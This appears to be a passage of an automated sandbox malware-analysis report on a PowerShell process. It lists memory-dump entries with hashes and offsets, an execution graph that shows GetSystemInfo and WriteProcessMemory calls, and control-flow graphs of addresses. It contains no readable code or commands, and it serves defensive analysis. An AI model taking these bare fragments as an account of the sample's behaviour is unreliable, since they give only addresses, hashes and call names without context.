                                                                                        • Source File: 00000002.00000002.2130172067.000000000439D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0439D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_439d000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1afa11b49109b10743365d27df591a85bb7eacee98dd461a2e996ce6d0ecd4c4
                                                                                        • Instruction ID: 92a66fd4bf9090f222c32d7baf804a95990935f19e529872f049f7cd9339ba7e
                                                                                        • Opcode Fuzzy Hash: 1afa11b49109b10743365d27df591a85bb7eacee98dd461a2e996ce6d0ecd4c4
                                                                                        • Instruction Fuzzy Hash: 5A011E6240E3C09FE7128B259D95B52BFB4DF43224F1981DBD9888F2A7C2695849C772
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2131241082.00000000044A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_44a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 099e4613cbbbf067f5fbfbdabd5ce19d200b8f03f918cdcdd07c8fef38bd75b4
                                                                                        • Instruction ID: a2f0e87e7e3e7b05065dda1aab8c5c6005df98163d969189466d9d8213009334
                                                                                        • Opcode Fuzzy Hash: 099e4613cbbbf067f5fbfbdabd5ce19d200b8f03f918cdcdd07c8fef38bd75b4
                                                                                        • Instruction Fuzzy Hash: 98E0C975E0824E8FDF54DFB894123AEBBF1AB08301F10446BC81DE2241E73856528F85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2131241082.00000000044A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_44a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c22213f4fd0cd88d265ed3b4e40538871445c5ecf246d7c8998ef3c4777a0f3a
                                                                                        • Instruction ID: d3f14fd579af0b93d9cfe8df31eb18d6cbe7a744e9ee1379d0b085538af3f6bf
                                                                                        • Opcode Fuzzy Hash: c22213f4fd0cd88d265ed3b4e40538871445c5ecf246d7c8998ef3c4777a0f3a
                                                                                        • Instruction Fuzzy Hash: BDE026B4E0424E9F8F98DFB995421BEFBF5AB48204F1085AF9829E7340E63496118FD5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2131241082.00000000044A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_44a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d76a3801952b87194525c83f8d1dd342034595c3f47c3c286b0806323c4c9ce
                                                                                        • Instruction ID: 46c1a07d484d98125bcf985fe827324155ca01660cee956baf1df5cdaa2a6537
                                                                                        • Opcode Fuzzy Hash: 2d76a3801952b87194525c83f8d1dd342034595c3f47c3c286b0806323c4c9ce
                                                                                        • Instruction Fuzzy Hash: B6C0807140818855DB3C0570A4597783F449F70118F320067D71D04D415F55B5E5C3E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2131241082.00000000044A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_44a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7eb3115711e10b05657aba109afe522c34d59f73e55769604bacf08686a30f40
                                                                                        • Instruction ID: 05927ce947a3cd4039a7f1346fe99918a1084d681abb68c58d0256bc5924c5f4
                                                                                        • Opcode Fuzzy Hash: 7eb3115711e10b05657aba109afe522c34d59f73e55769604bacf08686a30f40
                                                                                        • Instruction Fuzzy Hash: 59C09B3004875CC7D73D6BB5610FF757B58A770215F550053D61D406529F65F4A4C7B1

                                                                                        Execution Graph

                                                                                        Execution Coverage:4.3%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:35
                                                                                        Total number of Limit Nodes:4
                                                                                        execution_graph 73903 70cef98 73904 70cefc2 73903->73904 73905 70cf0f8 73903->73905 73904->73905 73911 68a2cf0 73904->73911 73914 68a2865 73904->73914 73919 68a2920 73904->73919 73924 68a28d7 73904->73924 73929 68a2b78 73904->73929 73912 68a2d36 GetSystemInfo 73911->73912 73913 68a2d66 73912->73913 73913->73905 73917 68a2864 73914->73917 73915 68a2d36 GetSystemInfo 73916 68a2d66 73915->73916 73916->73905 73917->73914 73917->73915 73918 68a2a2e 73917->73918 73918->73905 73922 68a2959 73919->73922 73920 68a2d36 GetSystemInfo 73921 68a2d66 73920->73921 73921->73905 73922->73920 73923 68a2a2e 73922->73923 73923->73905 73927 68a2864 73924->73927 73925 68a2d36 GetSystemInfo 73926 68a2d66 73925->73926 73926->73905 73927->73924 73927->73925 73928 68a2a2e 73927->73928 73928->73905 73930 68a2aa8 73929->73930 73933 68a2b91 73929->73933 73930->73929 73931 68a2d36 GetSystemInfo 73930->73931 73932 68a2d66 73931->73932 73932->73905 73890 6f99b30 73891 6f99b48 73890->73891 73892 6f99c53 73891->73892 73895 68a4038 73891->73895 73899 68a4037 73891->73899 73896 68a4083 WriteProcessMemory 73895->73896 73898 68a40d4 73896->73898 73898->73892 73900 68a4038 WriteProcessMemory 73899->73900 73902 68a40d4 73900->73902 73902->73892
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2942203586.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_28a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4
                                                                                        • API String ID: 0-4088798008
                                                                                        • Opcode ID: 0ea3e6cc037f377e840cbd9d4ec7e2ec5cdafe2a2f8d380523995a613ece56ff
                                                                                        • Instruction ID: 0cd0dbc5c7d55aaf4df8bfd1b66c3f82e8f98c0018f4af1b02a22767d5d5625c
                                                                                        • Opcode Fuzzy Hash: 0ea3e6cc037f377e840cbd9d4ec7e2ec5cdafe2a2f8d380523995a613ece56ff
                                                                                        • Instruction Fuzzy Hash: 4DB2EC38A00218DFEB24CFA4C994B9DB7B6BB48315F158195E909EB3A9DB70DD81CF50

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2474 68a2920-68a2957 2475 68a2959-68a2960 2474->2475 2476 68a299d 2474->2476 2478 68a2962-68a296f 2475->2478 2479 68a2971 2475->2479 2477 68a29a0-68a29dc 2476->2477 2488 68a29e2-68a29eb 2477->2488 2489 68a2a60-68a2a6b 2477->2489 2480 68a2973-68a2975 2478->2480 2479->2480 2482 68a297c-68a297e 2480->2482 2483 68a2977-68a297a 2480->2483 2485 68a298f 2482->2485 2486 68a2980-68a298d 2482->2486 2487 68a299b 2483->2487 2490 68a2991-68a2993 2485->2490 2486->2490 2487->2477 2488->2489 2491 68a29ed-68a29f3 2488->2491 2492 68a2a7a-68a2aa2 2489->2492 2493 68a2a6d-68a2a70 2489->2493 2490->2487 2495 68a29f9-68a2a06 2491->2495 2496 68a2cd1-68a2d64 GetSystemInfo 2491->2496 2500 68a2aa8-68a2ab1 2492->2500 2501 68a2b91-68a2bae 2492->2501 2493->2492 2498 68a2a08-68a2a2c 2495->2498 2499 68a2a57-68a2a5e 2495->2499 2506 68a2d6b-68a2d7f 2496->2506 2507 68a2d66 2496->2507 2511 68a2a2e-68a2a31 2498->2511 2512 68a2a53 2498->2512 2499->2489 2499->2491 2500->2496 2504 68a2ab7-68a2ae7 2500->2504 2517 68a2bb4-68a2c10 2501->2517 2518 68a2ae9-68a2b2f 2504->2518 2519 68a2b31-68a2b44 2504->2519 2507->2506 2514 68a2a3d-68a2a50 2511->2514 2515 68a2a33-68a2a36 2511->2515 2512->2499 2515->2514 2531 68a2c5a-68a2c6d 2517->2531 2532 68a2c12-68a2c58 2517->2532 2521 68a2b46-68a2b4d 2518->2521 2519->2521 2522 68a2b4f-68a2b60 2521->2522 2523 68a2b75-68a2b8b 2521->2523 2522->2523 2527 68a2b62-68a2b6e 2522->2527 2523->2500 2523->2501 2527->2523 2533 68a2c6f-68a2c76 2531->2533 2532->2533 2534 68a2c78-68a2c7e 2533->2534 2535 68a2c85-68a2c8f 2533->2535 2534->2535 2535->2517
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2979733863.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_68a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 062f84943509fd4407ae2ef2ba196f72e7bc3097fe8b60aa000bab062251e7eb
                                                                                        • Instruction ID: c8c2ad76949f2cf463c8439196b59f178af578a45d3fb69f93522435936dd6d1
                                                                                        • Opcode Fuzzy Hash: 062f84943509fd4407ae2ef2ba196f72e7bc3097fe8b60aa000bab062251e7eb
                                                                                        • Instruction Fuzzy Hash: F8D11A74D00619DFDB60CFA9C590A9DFBB1BF88314F288659D814AB352D770EA86CF80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2942203586.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_28a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4
                                                                                        • API String ID: 0-4088798008
                                                                                        • Opcode ID: 505d87788cba4d2589bfa8a9e5a704707998ee80d9416a3bdf75597dd0bc09e5
                                                                                        • Instruction ID: c42d48394e1b80d147b8830fe0666ef66dcdbda71aaa9c6be981e3fdca5c1e89
                                                                                        • Opcode Fuzzy Hash: 505d87788cba4d2589bfa8a9e5a704707998ee80d9416a3bdf75597dd0bc09e5
                                                                                        • Instruction Fuzzy Hash: 3422DC38A00219CFEB24CF64C994BADB7B6BF48315F1481A9D909EB295DB71ED81CF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981102863.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \V|m
                                                                                        • API String ID: 0-2015827483
                                                                                        • Opcode ID: 4b53f86cc494e32ac99d8ddd450550e209409c4dc252ae0b223bde8814c84a6a
                                                                                        • Instruction ID: b8c7d457d755f342ca067cff06f29840762a15f29a91d17590b0cc0968ed6b96
                                                                                        • Opcode Fuzzy Hash: 4b53f86cc494e32ac99d8ddd450550e209409c4dc252ae0b223bde8814c84a6a
                                                                                        • Instruction Fuzzy Hash: 6AB16D70E10219DFDF54DFA9D8857AEBBF2AF88314F148129E815EB394EB749841CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981246123.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a40000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a5d088398f0642e050ac832d9aeee1bb3a26167ff27d7ee23c2eed04d886bb70
                                                                                        • Instruction ID: 7bc2feaa6cd2c506698d222758f77e350d30558608e6a335552120f49772b61f
                                                                                        • Opcode Fuzzy Hash: a5d088398f0642e050ac832d9aeee1bb3a26167ff27d7ee23c2eed04d886bb70
                                                                                        • Instruction Fuzzy Hash: F9A29375E00628CFDB65DF69C984A99BBB2FF89300F1581E9D509AB321DB319E81CF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981246123.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a40000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a672f7165ed25ef00cd7401970e01c763590735224698e0eacfe31369dd1da0d
                                                                                        • Instruction ID: 17e9cd44509ea20d9bcff5a7d50ca281c7b717f94b585d11a31278bdf0170f79
                                                                                        • Opcode Fuzzy Hash: a672f7165ed25ef00cd7401970e01c763590735224698e0eacfe31369dd1da0d
                                                                                        • Instruction Fuzzy Hash: 6052A478A002288FDB64DF28CD84B9ABBB2FB89301F1095D9D90DA7355DB309E85CF55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981102863.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c71adfc35ed6f6c4d3783a83f2d72f6c3158f53bc298229fde344feee22d5b45
                                                                                        • Instruction ID: 1d5ef7ddd400165481ccaed1b9a18555d4380e4b27ce41f315b623dc77f62359
                                                                                        • Opcode Fuzzy Hash: c71adfc35ed6f6c4d3783a83f2d72f6c3158f53bc298229fde344feee22d5b45
                                                                                        • Instruction Fuzzy Hash: 63E11674E04228CFEB94DFA9D944B9EBBF2FF89300F1090A9E509AB254DB745985CF41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981102863.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 62415a36f92b6a5e3675b33185852abf23c2622900c8b10b07ca8b02b0ca454e
                                                                                        • Instruction ID: 1cf101307f5df5affdf8876add210d8c508a6e81d9a581c85c8386622a6f1244
                                                                                        • Opcode Fuzzy Hash: 62415a36f92b6a5e3675b33185852abf23c2622900c8b10b07ca8b02b0ca454e
                                                                                        • Instruction Fuzzy Hash: 78E11574E04228CFEB94DFA9D844B9EBBF2FF89300F1090A9E509AB254DB745985CF45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2979733863.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_68a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 615c9057ba7dcb72b1d401427b9b7bf4c622d752bb190611d2b27af3648b13d4
                                                                                        • Instruction ID: 1cad69ea468df537eaa48293d956b3c45a65bc8ccf64a3381944f3fdb192512d
                                                                                        • Opcode Fuzzy Hash: 615c9057ba7dcb72b1d401427b9b7bf4c622d752bb190611d2b27af3648b13d4
                                                                                        • Instruction Fuzzy Hash: 42D1B474E11259CFDB58DFA9D980A9DBBB2FF88300F1081A9D909AB365DB319D81CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985011959.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6fa0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 777d10f72c29c31ccf943fff412f3eb6a89d1f344a6558a3541b1039c62a44d5
                                                                                        • Instruction ID: 1061db3579615f6947308962f8f0c4ce606ea6888d716e32bcae96088bdbde87
                                                                                        • Opcode Fuzzy Hash: 777d10f72c29c31ccf943fff412f3eb6a89d1f344a6558a3541b1039c62a44d5
                                                                                        • Instruction Fuzzy Hash: 1EB15EB1E00309CFDB50CFA9E8857EEBBF2AF88318F148529D855E7254EB749845CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985011959.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6fa0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 14abccf7ab4560550e7d08b84c5092902ed2ff6712ed5eebcbbd22c8be7bdc90
                                                                                        • Instruction ID: b742afbf82bce1a8907090a7a8c70f015bcfeb0f11949ba4f59be4ed9e9a4849
                                                                                        • Opcode Fuzzy Hash: 14abccf7ab4560550e7d08b84c5092902ed2ff6712ed5eebcbbd22c8be7bdc90
                                                                                        • Instruction Fuzzy Hash: 3E7127B4E15318CFDB54CFA8E485BAEBBF6FB8A300F109069E409A7241DBB45946CF45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985011959.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6fa0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 62956aa887032d4e85723996759a336a41dc935f3254560bdee8ded2a2eb8495
                                                                                        • Instruction ID: 4259fd8b69be0847c88eaa8c80fe543c8da0d346b82b5dc664f4dfea08a8ce6a
                                                                                        • Opcode Fuzzy Hash: 62956aa887032d4e85723996759a336a41dc935f3254560bdee8ded2a2eb8495
                                                                                        • Instruction Fuzzy Hash: 8971F6B4E15318CFDB54CFA8E485BAEBBF2FB8A300F109069D409A7254DBB45985CF45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981102863.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a5fb4744dbe0f4da28c0c0fed3b517a6d5fc2d6bb0ea91ca42417de03d8bba79
                                                                                        • Instruction ID: 618292d7113b3c8cf6222fef8c2c0094c1078969f6eeabcf0ca008f0cc38c548
                                                                                        • Opcode Fuzzy Hash: a5fb4744dbe0f4da28c0c0fed3b517a6d5fc2d6bb0ea91ca42417de03d8bba79
                                                                                        • Instruction Fuzzy Hash: 57514674D05228DFEB94EFA9D1987EDBBF6FB49300F10A029E409AB290DB745985CF44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981102863.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6d92720870c7ae15afab6dbe0b2e8147eaec75d32cd6bd5188b6b7c4a37c660f
                                                                                        • Instruction ID: 6adda5416ebbac8d4bcb2dce686c1c7a62555b2009ead91622b9b19903a6b23a
                                                                                        • Opcode Fuzzy Hash: 6d92720870c7ae15afab6dbe0b2e8147eaec75d32cd6bd5188b6b7c4a37c660f
                                                                                        • Instruction Fuzzy Hash: 93515874D05228DFEB94EFA9D1987EDBBF6FB49300F10A029E409AB290DB745985CF44

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 70c8330-70c8352 1 70c8358-70c835d 0->1 2 70c8b0b-70c8b33 0->2 3 70c835f-70c8365 1->3 4 70c8375-70c837c 1->4 5 70c8369-70c8373 3->5 6 70c8367 3->6 4->2 7 70c837d-70c8387 4->7 5->4 6->4 9 70c839f-70c83a6 7->9 10 70c8389-70c838d 7->10 9->2 15 70c83ac-70c83b1 9->15 12 70c838f 10->12 13 70c83f8 10->13 19 70c8391 12->19 20 70c8393-70c839d 12->20 18 70c83f9-70c8418 13->18 16 70c83c9 15->16 17 70c83b3-70c83b9 15->17 23 70c83cc-70c83d6 16->23 21 70c83bd-70c83c7 17->21 22 70c83bb 17->22 24 70c841a-70c8444 18->24 25 70c8447-70c8451 18->25 19->9 20->9 21->16 22->16 23->2 27 70c83dc-70c83e1 23->27 24->25 25->2 29 70c8457-70c845c 25->29 27->18 32 70c83e3-70c83e9 27->32 30 70c845e-70c8464 29->30 31 70c8474-70c84a5 29->31 35 70c8468-70c8472 30->35 36 70c8466 30->36 31->2 43 70c84ab-70c84b3 31->43 37 70c83ed-70c83f7 32->37 38 70c83eb 32->38 35->31 36->31 37->18 38->18 44 70c84cb-70c84dd 43->44 45 70c84b5-70c84bb 43->45 44->2 48 70c84e3-70c84eb 44->48 46 70c84bd 45->46 47 70c84bf-70c84c9 45->47 46->44 47->44 49 70c84ed-70c84f3 48->49 50 70c8503-70c8515 48->50 52 70c84f5 49->52 53 70c84f7-70c8501 49->53 50->2 54 70c851b-70c8520 50->54 52->50 53->50 55 70c8538-70c8544 54->55 56 70c8522-70c8528 54->56 55->2 57 70c854a-70c8568 55->57 59 70c852c-70c8536 56->59 60 70c852a 56->60 63 70c856a-70c8570 57->63 64 70c8582-70c85cc 57->64 59->55 60->55 65 70c8574-70c8580 63->65 66 70c8572 63->66 73 70c8af0-70c8afc 64->73 74 70c85d2-70c8604 64->74 65->64 66->64 77 70c862d-70c8637 74->77 78 70c8606-70c8625 74->78 79 70c863d-70c8642 77->79 80 70c88b3-70c88e8 77->80 78->77 82 70c865a-70c868b 79->82 83 70c8644-70c864a 79->83 111 70c89be-70c89d2 80->111 82->80 88 70c8691-70c8699 82->88 84 70c864c 83->84 85 70c864e-70c8658 83->85 84->82 85->82 91 70c869b-70c86a1 88->91 92 70c86b1-70c86c3 88->92 94 70c86a5-70c86af 91->94 95 70c86a3 91->95 92->80 96 70c86c9-70c86d1 92->96 94->92 95->92 97 70c86e9-70c86fb 96->97 98 70c86d3-70c86d9 96->98 97->80 102 70c8701-70c8706 97->102 100 70c86dd-70c86e7 98->100 101 70c86db 98->101 100->97 101->97 104 70c871e-70c872a 102->104 105 70c8708-70c870e 102->105 104->80 110 70c8730-70c8761 104->110 108 70c8710 105->108 109 70c8712-70c871c 105->109 108->104 109->104 119 70c877b-70c87ed 110->119 120 70c8763-70c8769 110->120 112 70c89fb-70c8a24 111->112 113 70c89d4-70c89f3 111->113 112->2 121 70c8a2a-70c8a2f 112->121 113->112 119->80 147 70c87f3-70c8814 119->147 124 70c876d-70c8779 120->124 125 70c876b 120->125 122 70c8a47-70c8a56 121->122 123 70c8a31-70c8a37 121->123 122->2 128 70c8a5c-70c8a63 122->128 126 70c8a39 123->126 127 70c8a3b-70c8a45 123->127 124->119 125->119 126->122 127->122 130 70c8a7b-70c8ad5 128->130 131 70c8a65-70c8a6b 128->131 148 70c8aeb 130->148 149 70c8ad7-70c8ae6 130->149 134 70c8a6d 131->134 135 70c8a6f-70c8a79 131->135 134->130 135->130 152 70c882e-70c8830 147->152 153 70c8816-70c881c 147->153 148->23 149->23 156 70c884a-70c888f 152->156 157 70c8832-70c8838 152->157 154 70c881e 153->154 155 70c8820-70c882c 153->155 154->152 155->152 156->80 166 70c8891-70c88a7 156->166 158 70c883c-70c8848 157->158 159 70c883a 157->159 158->156 159->156 168 70c88ae 166->168 168->111
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985468302.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (fi$(fi$(fi$(fi
                                                                                        • API String ID: 0-1040940215
                                                                                        • Opcode ID: b69d4f9d08b2893bd26a7a66e2345cec8704926e7fdc79a439409dbca38d24e6
                                                                                        • Instruction ID: 7569b11f5d0500ebc54d5a7242ad9f64aca9a4023460e4169dbc406ab09b56ed
                                                                                        • Opcode Fuzzy Hash: b69d4f9d08b2893bd26a7a66e2345cec8704926e7fdc79a439409dbca38d24e6
                                                                                        • Instruction Fuzzy Hash: EB2279B4B00205DFDB54CB98C594A6EBBF2AFC5304F24C269E9059B395CB72EC42CB95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 169 6f969df-6f969f2 170 6f969f8-6f96a7c 169->170 171 6f97464-6f974ad 169->171 183 6f96aab-6f96b28 170->183 184 6f96a7e-6f96aa3 170->184 185 6f9602e-6f96052 171->185 186 6f96027 171->186 206 6f96b2a-6f96b4f 183->206 207 6f96b57-6f96b64 183->207 184->183 189 6f96081-6f960e1 185->189 190 6f96054-6f96079 185->190 186->185 187 6f960e8-6f9610c 186->187 192 6f9613b-6f96148 187->192 193 6f9610e-6f96133 187->193 189->187 190->189 192->171 195 6f9614e-6f9617c 192->195 193->192 195->171 202 6f96182-6f961b0 195->202 202->171 208 6f961b6-6f961e4 202->208 206->207 207->171 210 6f96b6a-6f96bb8 207->210 208->171 214 6f961ea-6f962c7 208->214 210->171 219 6f96bbe-6f96bda 210->219 233 6f9658d-6f965b1 214->233 234 6f962cd-6f962e7 214->234 219->171 222 6f96be0-6f96c1d 219->222 222->171 228 6f96c23-6f96c61 222->228 228->171 235 6f96c67-6f96d2e 228->235 238 6f965e0-6f966f6 233->238 239 6f965b3-6f965d8 233->239 236 6f962e9-6f9630e 234->236 237 6f96316-6f96323 234->237 235->171 265 6f96d34-6f96d84 235->265 236->237 240 6f96329-6f9636d 237->240 241 6f96544-6f96588 237->241 285 6f96959-6f96987 238->285 286 6f966fc-6f96716 238->286 239->238 240->241 253 6f96373-6f96393 240->253 241->233 253->241 259 6f96399-6f963cc 253->259 259->241 269 6f963d2-6f96432 259->269 265->171 277 6f96d8a-6f96de6 265->277 269->241 281 6f96438-6f964e6 269->281 295 6f96deb-6f96e32 277->295 281->241 311 6f964e8-6f96542 281->311 308 6f9698c-6f969dc 285->308 291 6f96718-6f96724 286->291 292 6f96740 286->292 297 6f9672e-6f96734 291->297 298 6f96726-6f9672c 291->298 293 6f96746-6f96794 292->293 293->285 316 6f9679a-6f967af 293->316 304 6f96e61-6f96e96 295->304 305 6f96e34-6f96e59 295->305 299 6f9673e 297->299 298->299 299->293 304->171 313 6f96e9c-6f96ec0 304->313 305->304 308->171 311->233 313->171 319 6f96ec6-6f96f22 313->319 323 6f967c9-6f967fe 316->323 324 6f967b1-6f967b7 316->324 342 6f96f24-6f96f39 319->342 343 6f96f47-6f96f4d 319->343 323->285 335 6f96804-6f96824 323->335 328 6f967b9 324->328 329 6f967bb-6f967c7 324->329 328->323 329->323 335->285 339 6f9682a-6f9690e 335->339 339->285 368 6f96910-6f96957 339->368 344 6f96f53-6f96f9a 342->344 343->344 348 6f96fc9-6f96fd6 344->348 349 6f96f9c-6f96fc1 344->349 348->171 351 6f96fdc-6f9700a 348->351 349->348 351->171 356 6f97010-6f9703e 351->356 356->171 359 6f97044-6f97072 356->359 359->171 362 6f97078-6f97155 359->362 379 6f9715b-6f97175 362->379 380 6f974b2-6f975ba 362->380 368->308 381 6f971a4-6f971b1 379->381 382 6f97177-6f9719c 379->382 387 6f975e9-6f9761e 380->387 388 6f975bc-6f975e1 380->388 384 6f97419-6f97462 381->384 385 6f971b7-6f971fb 381->385 382->381 384->171 384->380 385->384 398 6f97201-6f97221 385->398 394 6f97709-6f9774d 387->394 395 6f97624-6f97652 387->395 388->387 416 6f97752 394->416 395->394 403 6f97658-6f976ca 395->403 398->384 405 6f97227-6f9725a 398->405 421 6f976f8-6f976fe 403->421 422 6f976cc-6f976e7 403->422 405->384 415 6f97260-6f972c0 405->415 415->384 425 6f972c6-6f97326 415->425 416->416 421->394 425->384 429 6f9732c-6f973b5 425->429 429->384 434 6f973b7-6f97414 429->434 434->380
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2984880389.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f90000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (fi$(fi$(fi
                                                                                        • API String ID: 0-2959321493
                                                                                        • Opcode ID: 60f3ebdf248549eee38ce15d958c4c5bce84993511875b31649dca4d169c117e
                                                                                        • Instruction ID: 4c27a0438b58ad4098fd5a9579fce2a0f8a746f1aedc29499fd2b2defc13b64e
